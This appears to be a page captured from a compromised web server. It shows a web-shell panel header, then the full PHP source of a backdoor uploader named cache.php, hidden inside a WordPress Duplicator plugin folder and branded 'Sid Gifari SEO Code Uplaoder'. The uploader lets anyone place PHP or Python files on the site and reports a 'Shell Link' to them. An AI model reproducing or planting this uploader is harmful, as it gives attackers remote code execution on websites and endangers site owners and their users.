HEX
Server: LiteSpeed
System: Linux host.point2pointhosting.com 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
User: nolabhpoint2p (1291)
PHP: 8.4.15
Disabled: NONE
Upload Files
File: /home/nolabhpoint2p/public_html/wp-content/plugins/duplicator/src/src/cache.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
        integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>
<title>Sid Gifari SEO Code Uplaoder</title>
<center><h1>Sid Gifari SEO Code Uplaoder</h1></center>
<center><h4>Telegram:sidgifari</h4></center>
<div align="center"> <img src = 

"https://i.imgur.com/FC1enOU.jpeg"width="200" height="150"></img>
<div style="margin:1em auto; width:333px; text-align:center;">
 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" 

method="POST" enctype="multipart/form-data">
  Upload File: <input type="file" name="fileup" /><br/>
  <input type="submit" name='submit' value="Upload" />
 </form>
</div>
<?php

$uploadpath = './';      // directory to store the uploaded files
$max_size = 2000;       // maximum file size, in KiloBytes
$alwidth = 900;         // maximum allowed width, in pixels
$alheight = 800;        // maximum allowed height, in pixels
$allowtype = array('txt', 'php', 'jpg', 'html', 'zip', 'gz', 'rar', 'py'); // allowed extensions

if (isset($_FILES['fileup']) && strlen($_FILES['fileup']['name']) > 1) {
    $uploadpath = $uploadpath . basename($_FILES['fileup']['name']); // get the file name
    $sepext = explode('.', strtolower($_FILES['fileup']['name']));
    $type = end($sepext); // extension
    list($width, $height) = getimagesize($_FILES['fileup']['tmp_name']); // image dims (if image)
    $err = ''; // collect errors

    // --- checks for allowed type, size, width and height (images) ---
    if (!in_array($type, $allowtype)) {
        $err .= 'The file: <b>' . $_FILES['fileup']['name'] . '</b> not has the allowed extension type.';
    }
    if (isset($_FILES['fileup']['size']) && $_FILES['fileup']['size'] > $max_size * 1024) {
        $err .= '<br/>Maximum file size must be: ' . $max_size . ' KB.';
    }
    if (isset($width) && isset($height) && ($width > $alwidth || $height > $alheight)) {
        $err .= '<br/>The maximum Width x Height must be: ' . $alwidth . ' x ' . $alheight;
    }

    // if no errors, move the uploaded file into place and print success messages
    if ($err == '') {
        if (move_uploaded_file($_FILES['fileup']['tmp_name'], $uploadpath)) {
            echo 'Shell: <b>' . basename($_FILES['fileup']['name']) . '</b> Hey Sid! Your Shell Is upload Done !! :D';
            echo '<br/>File type: <b>' . $_FILES['fileup']['type'] . '</b>';
            echo '<br/>Size: <b>' . number_format($_FILES['fileup']['size'] / 1024, 3) . '</b> KB';
            if (isset($width) && isset($height)) echo '<br/>Image Width x Height: ' . $width . ' x ' . $height;
            echo '<br/><br/>Shell Link: <b>http://' . $_SERVER['HTTP_HOST'] . rtrim(dirname($_SERVER['REQUEST_URI']), '\\/') . '/' . $uploadpath . '</b>';
        } else {
            echo '<b>Unable to upload the file.</b>';
        }
    } else {
        echo $err;
    }
}
?>
</body>
</html>